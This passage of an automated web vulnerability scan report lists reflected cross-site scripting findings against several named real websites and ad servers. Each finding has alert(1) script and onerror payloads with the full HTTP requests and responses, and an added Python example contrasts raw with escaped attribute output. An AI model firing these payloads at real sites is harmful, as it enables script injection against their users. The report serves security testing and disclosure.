Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 22451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/internet-domain-names?1054a"><script>alert(1)</script>764b2703e6d=1');" title="Email Page">
...[SNIP]...

4.182. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 112f8"><script>alert(1)</script>30080c8fca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services112f8"><script>alert(1)</script>30080c8fca4/v_arrow.gif HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services112f8"><script>alert(1)</script>30080c8fca4/v_arrow.gif');" title="Email Page">
...[SNIP]...

4.183. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653a6"><script>alert(1)</script>2fcbffe32e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/v_arrow.gif653a6"><script>alert(1)</script>2fcbffe32e0 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/v_arrow.gif653a6"><script>alert(1)</script>2fcbffe32e0');" title="Email Page">
...[SNIP]...

4.184. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec0c"><script>alert(1)</script>f8e70455e0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/v_arrow.gif?5ec0c"><script>alert(1)</script>f8e70455e0b=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:32 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/v_arrow.gif?5ec0c"><script>alert(1)</script>f8e70455e0b=1');" title="Email Page">
...[SNIP]...

4.185. http://adserving.cpxinteractive.com/st [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fb61'-alert(1)-'ef62d92b22c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5fb61'-alert(1)-'ef62d92b22c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:50 GMT
Content-Length: 486

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://www.google.com/search%3Fhl=en%26q=5fb61'-alert(1)-'ef62d92b22c&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3
...[SNIP]...

4.186. http://da.newstogram.com/hg.php [DMUserTrack cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 80608<img%20src%3da%20onerror%3dalert(1)>ced85d84f5e was submitted in the DMUserTrack cookie. This input was echoed as 80608<img src=a onerror=alert(1)>ced85d84f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C780608<img%20src%3da%20onerror%3dalert(1)>ced85d84f5e

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C780608%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eced85d84f5e; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 166

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C780608<img src=a onerror=alert(1)>ced85d84f5e","ip":"173.193.214.243"}})

4.187. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload bc53c<script>alert(1)</script>7938f70db0c was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&jsref=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2F&rnd=1305203804180 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==bc53c<script>alert(1)</script>7938f70db0c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 12:36:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==bc53c<script>alert(1)</script>7938f70db0c
userid:
</div>
...[SNIP]...

4.188. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 297a7"><script>alert(1)</script>a42cb4459e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7"><script>alert(1)</script>a42cb4459e; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2026
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7"><script>alert(1)</script>a42cb4459e&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7">
...[SNIP]...
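The attribute break-out used in findings 4.188 and 4.189 (and, in a form-field value, in 4.191), shown as an added Python example that is not part of the scan report or of the vendor's code: a stand-in for the server-side template that builds the tracking <img> in the 4.188 response, first concatenating the cookie value raw as the capture shows, then with HTML attribute encoding, and a tokeniser-based check that reports whether the value escaped the src="..." attribute. The template functions and the analyse helper are illustrative assumptions; the payload is the one from the finding.

```python
"""Attribute-context reflection: the pattern behind findings 4.188/4.189.

Added example, not code from the scan report or from the ad server. The
render_* functions stand in for the vendor's template (an assumption); the
markup they emit is copied from the captured 4.188 response, with the long
query string kept so the check runs against realistic input.
"""
from html import escape
from html.parser import HTMLParser

# Payload exactly as submitted in the meld_sess cookie in finding 4.188.
PAYLOAD = '297a7"><script>alert(1)</script>a42cb4459e'
# Cookie prefix from the same request.
BASE_ID = "ac5afe89-dbe3-4a99-9c60-59f4fb495cb9"

_PIXEL_PREFIX = ('<img width="0" height="0" src="http://p.brilig.com/contact/bct'
                 '?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=')


def render_pixel_vulnerable(user_id):
    """Mirror of the captured markup: the cookie value is concatenated raw,
    so a double quote in it closes the src attribute and '>' closes the tag."""
    return _PIXEL_PREFIX + user_id + '">'


def render_pixel_fixed(user_id):
    """Same markup with the value HTML-attribute-encoded. quote=True turns
    '"' into &quot; (and & < > into entities), so the attribute cannot be
    closed early and no new tag can start inside it."""
    return _PIXEL_PREFIX + escape(user_id, quote=True) + '">'


class _TagCollector(HTMLParser):
    """Record every start tag the tokeniser sees, plus the img attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.img_attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "img":
            self.img_attrs = dict(attrs)


def analyse(markup):
    """Tokenise the markup as a browser would and return
    (list of start tags seen, the puid value as read back from img src).

    If the cookie value broke out of the attribute, a 'script' tag shows up
    in the list and the puid read from src is cut off at the injected quote.
    """
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    src = collector.img_attrs.get("src", "")
    puid = src.split("puid=", 1)[1] if "puid=" in src else ""
    return collector.tags, puid


if __name__ == "__main__":
    for name, render in (("vulnerable", render_pixel_vulnerable),
                         ("fixed", render_pixel_fixed)):
        tags, puid = analyse(render(BASE_ID + PAYLOAD))
        print(f"{name}: tags={tags} puid={puid!r}")
```

In the vulnerable rendering the tokeniser reports an img followed by a script element; in the fixed rendering it reports only the img, and the puid read back from the attribute is the full cookie value, entities decoded, which is the behaviour the ad server needs without the break-out.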

4.189. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d3e"><script>alert(1)</script>0bc9f2cc5ef was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9f6d3e"><script>alert(1)</script>0bc9f2cc5ef; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2030
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:23 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9f6d3e"><script>alert(1)</script>0bc9f2cc5ef&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

4.190. http://trc.taboolasyndication.com/bloomberg/trc/2/json [taboola_user_id cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /bloomberg/trc/2/json

Issue detail

The value of the taboola_user_id cookie is copied into the response body without encoding. The payload c2917<img%20src%3da%20onerror%3dalert(1)>7feb297df63 was submitted in the taboola_user_id cookie and was echoed as c2917<img src=a onerror=alert(1)>7feb297df63 in the application's response.

The payload is an event-handler injection: rendered as HTML, the broken image's onerror handler would run arbitrary JavaScript. Two details of the capture qualify that, however. The response is served as text/plain; charset=utf-8 and its body is a JavaScript assignment (trc_json_response = {...}) in which the reflected value sits inside a JSON string literal, so in its intended use the <img> text is inert and the payload does not break out of the string. The server also writes the unmodified value back in Set-Cookie headers (taboola_user_id and taboola_session_id), so an injected value persists across later requests rather than being reflected once.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bloomberg/trc/2/json?publisher=bloomberg&pv=2&list-size=9&list-id=rbox-t2v&id=237&uim=horizontal-t2v&intent=s&uip=horizontal-t2v&item-id=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&item-type=text&item-url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&page-id=8b30818aaf47422a6a90e7b9a6ea55e93a6ee14a&cv=4-6-15-45512-2660204&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img%20src%3da%20onerror%3dalert(1)>7feb297df63

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:15 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id="d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63";Path=/;Expires=Fri, 11-May-12 11:39:15 GMT
Set-Cookie: taboola_session_id="v1_bb2bb5149baf45530a5e69614e17e0c0_d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63_1305200355_1305200355";Path=/bloomberg/
Set-Cookie: JSESSIONID=.prod2-f1;Path=/
Set-Cookie: taboola_wv=;Path=/bloomberg/;Expires=Fri, 11-May-12 11:39:15 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 7365

trc_json_response =
{"trc":{"req":"46ab7eb1276e8dc36cb3699da961992a","session-id":"bb2bb5149baf45530a5e69614e17e0c0","session-data":"v1_bb2bb5149baf45530a5e69614e17e0c0_d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63_1305200355_1305200355","user-id":"d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>
...[SNIP]...

4.191. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The value of the PCUSERNAME cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b051f"><img%20src%3da%20onerror%3dalert(1)>f07a5d839af was submitted in the PCUSERNAME cookie. This input was echoed as b051f"><img src=a onerror=alert(1)>f07a5d839af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=b051f"><img%20src%3da%20onerror%3dalert(1)>f07a5d839af; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<input type="text" name="pcusername" id="pcusername" value="b051f"><img src=a onerror=alert(1)>f07a5d839af" onblur="if(this.value.length == 0){this.value='Email Address'};" onfocus="if(this.value=='Email Address'){this.value=''};" class="required email" alias="Username" style="width:94%;">
...[SNIP]...

5. Flash cross-domain policy
There are 27 instances of this issue:

Issue background

